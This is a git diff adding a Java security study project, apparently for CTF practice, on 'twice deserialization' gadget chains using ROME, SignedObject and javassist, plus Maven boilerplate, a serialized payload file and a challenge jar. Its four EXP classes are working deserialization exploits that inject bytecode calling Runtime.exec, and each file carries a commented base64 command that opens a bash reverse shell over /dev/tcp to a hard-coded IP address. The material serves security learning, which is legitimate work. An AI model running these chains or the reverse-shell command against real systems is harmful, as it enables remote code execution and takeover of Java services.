+ <artifactid>$RMIConnector</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/pom.xml"
new file mode 100644
index 00000000..ffca9eb7
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/pom.xml"
@@ -0,0 +1,39 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.example</groupid>
+ <artifactid>TwiceDeserialize</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ </parent>
+ <artifactid>Rome</artifactid>
+ <name>Archetype - Rome</name>
+ <url>http://maven.apache.org</url>
+
+ <dependencies>
+ <dependency>
+ <groupid>rome</groupid>
+ <artifactid>rome</artifactid>
+ <version>1.0</version>
+ </dependency>
+ <dependency>
+ <groupid>org.apache.commons</groupid>
+ <artifactid>commons-collections4</artifactid>
+ <version>4.4</version>
+ </dependency>
+
+ </dependencies>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>7</source>
+ <target>7</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/EqualsBeanEXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/EqualsBeanEXP.java"
new file mode 100644
index 00000000..aa22ae55
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/EqualsBeanEXP.java"
@@ -0,0 +1,96 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ObjectBean;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.security.*;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Hashtable;
+
+public class EqualsBeanEXP {
+ public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
+ Field field = obj.getClass().getDeclaredField(fieldname);
+ field.setAccessible(true);
+ field.set(obj,value);
+ }
+
+ public static void main(String[] args) throws Exception{
+ byte[] bytes = getTemplatesImpl("Calc");
+
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
+ setFieldValue(obj, "_name", "a");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ Hashtable hashtable1 = getPayload(Templates.class, obj);
+
+ KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
+ kpg.initialize(1024);
+ KeyPair kp = kpg.generateKeyPair();
+ SignedObject signedObject = new SignedObject(hashtable1, kp.getPrivate(), Signature.getInstance("DSA"));
+
+ Hashtable hashtable2 = getPayload(SignedObject.class, signedObject);
+
+ serialize(hashtable2);
+
+ //System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
+
+ unserialize("ser.bin");
+ }
+
+ public static Hashtable getPayload (Class clazz, Object payloadObj) throws Exception{
+ EqualsBean bean = new EqualsBean(String.class, "r");
+ HashMap map1 = new HashMap();
+ HashMap map2 = new HashMap();
+ map1.put("yy", bean);
+ map1.put("zZ", payloadObj);
+ map2.put("zZ", bean);
+ map2.put("yy", payloadObj);
+ Hashtable table = new Hashtable();
+ table.put(map1, "1");
+ table.put(map2, "2");
+ setFieldValue(bean, "_beanClass", clazz);
+ setFieldValue(bean, "_obj", payloadObj);
+ return table;
+ }
+
+ public static byte[] getTemplatesImpl(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ // "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMC4xMS4yMzEvOTk5MCAwPiYx}&#124;{base64,-d}&#124;{bash,-i}\"}"
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/RomeEXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/RomeEXP.java"
new file mode 100644
index 00000000..8edf71de
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/RomeEXP.java"
@@ -0,0 +1,82 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ToStringBean;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+import org.apache.commons.collections4.functors.ChainedTransformer;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+
+public class RomeEXP {
+ public static void main(String[] args) throws Exception{
+ TemplatesImpl templates = new TemplatesImpl();
+ setFieldValue(templates,"_name","Drunkbaby");
+ setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
+ Class c = templates.getClass();
+ Field byteCodesField = c.getDeclaredField("_bytecodes");
+ byteCodesField.setAccessible(true);
+ byte[] evil = getTemplatesImpl("Calc");
+ byte[][] codes = {evil};
+ byteCodesField.set(templates,codes);
+// templates.newTransformer(); 
+ ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
+ EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);
+
+ HashMap hashMap = new HashMap<strong>();
+ hashMap.put(equalsBean,"123");
+
+ //再改回正常的参数
+ Field field = toStringBean.getClass().getDeclaredField("_obj");
+ field.setAccessible(true);
+ field.set(toStringBean,templates);
+
+ serialize(hashMap);
+ unserialize("ser.bin");
+
+ }
+
+ public static byte[] getTemplatesImpl(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ // "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMC4xMS4yMzEvOTk5MCAwPiYx}&#124;{base64,-d}&#124;{bash,-i}\"}" 
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void setFieldValue(Object object, String fieldName, Object value) throws Exception {
+ Class clazz = object.getClass();
+ Field field = clazz.getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(object,value);
+ }
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/SignedObjectEXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/SignedObjectEXP.java"
new file mode 100644
index 00000000..7d9d9d48
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/SignedObjectEXP.java"
@@ -0,0 +1,92 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ToStringBean;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+import org.apache.commons.collections4.functors.ChainedTransformer;
+import org.apache.commons.collections4.functors.ConstantTransformer;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.HashMap;
+
+public class SignedObjectEXP {
+ public static void main(String[] args) throws Exception{
+ TemplatesImpl templates = new TemplatesImpl();
+ setFieldValue(templates,"_name","Drunkbaby");
+ setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
+ Class c = templates.getClass();
+ Field byteCodesField = c.getDeclaredField("_bytecodes");
+ byteCodesField.setAccessible(true);
+ byte[] evil = getTemplatesImpl("Calc");
+ byte[][] codes = {evil};
+ byteCodesField.set(templates,codes);
+// templates.newTransformer();
+ ToStringBean toStringBean = new ToStringBean(Templates.class,new ConstantTransformer(1));
+ EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);
+
+ HashMap hashMap = new HashMap<strong>();
+ hashMap.put(equalsBean,"123");
+
+ //再改回正常的参数
+
+ Field field = toStringBean.getClass().getDeclaredField("_obj");
+ field.setAccessible(true);
+ field.set(toStringBean,templates);
+
+ KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
+ kpg.initialize(1024);
+ KeyPair kp = kpg.generateKeyPair();
+ SignedObject signedObject = new SignedObject(hashMap, kp.getPrivate(), Signature.getInstance("DSA"));
+
+ serialize(hashMap);
+ unserialize("ser.bin");
+
+ }
+
+ public static byte[] getTemplatesImpl(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ // "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMC4xMS4yMzEvOTk5MCAwPiYx}&#124;{base64,-d}&#124;{bash,-i}\"}"
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void setFieldValue(Object object, String fieldName, Object value) throws Exception {
+ Class clazz = object.getClass();
+ Field field = clazz.getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(object,value);
+ }
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/ToStringBeanEXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/ToStringBeanEXP.java"
new file mode 100644
index 00000000..9ee2cf1b
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/java/ToStringBeanEXP.java"
@@ -0,0 +1,88 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.syndication.feed.impl.EqualsBean;
+import com.sun.syndication.feed.impl.ObjectBean;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.security.*;
+import java.util.Base64;
+import java.util.HashMap;
+
+public class ToStringBeanEXP {
+ public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
+ Field field = obj.getClass().getDeclaredField(fieldname);
+ field.setAccessible(true);
+ field.set(obj,value);
+ }
+
+ public static void main(String[] args) throws Exception{
+ byte[] bytes = getTemplatesImpl("Calc");
+
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
+ setFieldValue(obj, "_name", "a");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ HashMap hashMap1 = getpayload(Templates.class, obj);
+
+ KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
+ kpg.initialize(1024);
+ KeyPair kp = kpg.generateKeyPair();
+ SignedObject signedObject = new SignedObject(hashMap1, kp.getPrivate(), Signature.getInstance("DSA"));
+
+ HashMap hashMap2 = getpayload(SignedObject.class, signedObject);
+
+ serialize(hashMap2);
+
+ //System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
+
+ unserialize("ser.bin");
+ }
+
+ public static HashMap getpayload(Class clazz, Object obj) throws Exception {
+ ObjectBean objectBean = new ObjectBean(ObjectBean.class, new ObjectBean(String.class, "rand"));
+ HashMap hashMap = new HashMap();
+ hashMap.put(objectBean, "rand");
+ ObjectBean expObjectBean = new ObjectBean(clazz, obj);
+ setFieldValue(objectBean, "_equalsBean", new EqualsBean(ObjectBean.class, expObjectBean));
+ return hashMap;
+ }
+
+ public static byte[] getTemplatesImpl(String cmd) {
+ try {
+ ClassPool pool = ClassPool.getDefault();
+ CtClass ctClass = pool.makeClass("Evil");
+ CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+ ctClass.setSuperclass(superClass);
+ CtConstructor constructor = ctClass.makeClassInitializer();
+ constructor.setBody(" try {\n" +
+ " Runtime.getRuntime().exec(\"" + cmd +
+ "\");\n" +
+ " } catch (Exception ignored) {\n" +
+ " }");
+ // "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMC4xMS4yMzEvOTk5MCAwPiYx}&#124;{base64,-d}&#124;{bash,-i}\"}"
+ byte[] bytes = ctClass.toBytecode();
+ ctClass.defrost();
+ return bytes;
+ } catch (Exception e) {
+ e.printStackTrace();
+ return new byte[]{};
+ }
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..bfa18053
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>Rome</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..a0709e40
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$Rome</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/Rome/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/pom.xml"
new file mode 100644
index 00000000..196f0702
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/pom.xml"
@@ -0,0 +1,23 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>org.example</groupid>
+ <artifactid>TwiceDeserialize</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ <packaging>pom</packaging>
+ <name>Archetype - TwiceDeserialize</name>
+ <url>http://maven.apache.org</url>
+ <modules>
+ <module>Rome</module>
+ <module>CommonsBeanUtils</module>
+ <module>RMIConnector</module>
+ </modules>
+
+ <dependencies>
+ <dependency>
+ <groupid>org.javassist</groupid>
+ <artifactid>javassist</artifactid>
+ <version>3.28.0-GA</version>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/ser.bin" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/ser.bin"
new file mode 100644
index 00000000..1b03b9d3
Binary files /dev/null and "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/ser.bin" differ
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..ce7353c4
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>TwiceDeserialize</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..02589d06
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$TwiceDeserialize</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 350円231円216円347円254円246円346円235円257円 ezchain/ezchain.jar" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 350円231円216円347円254円246円346円235円257円 ezchain/ezchain.jar"
new file mode 100644
index 00000000..956b1895
Binary files /dev/null and "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/timu/2022 350円231円216円347円254円246円346円235円257円 ezchain/ezchain.jar" differ
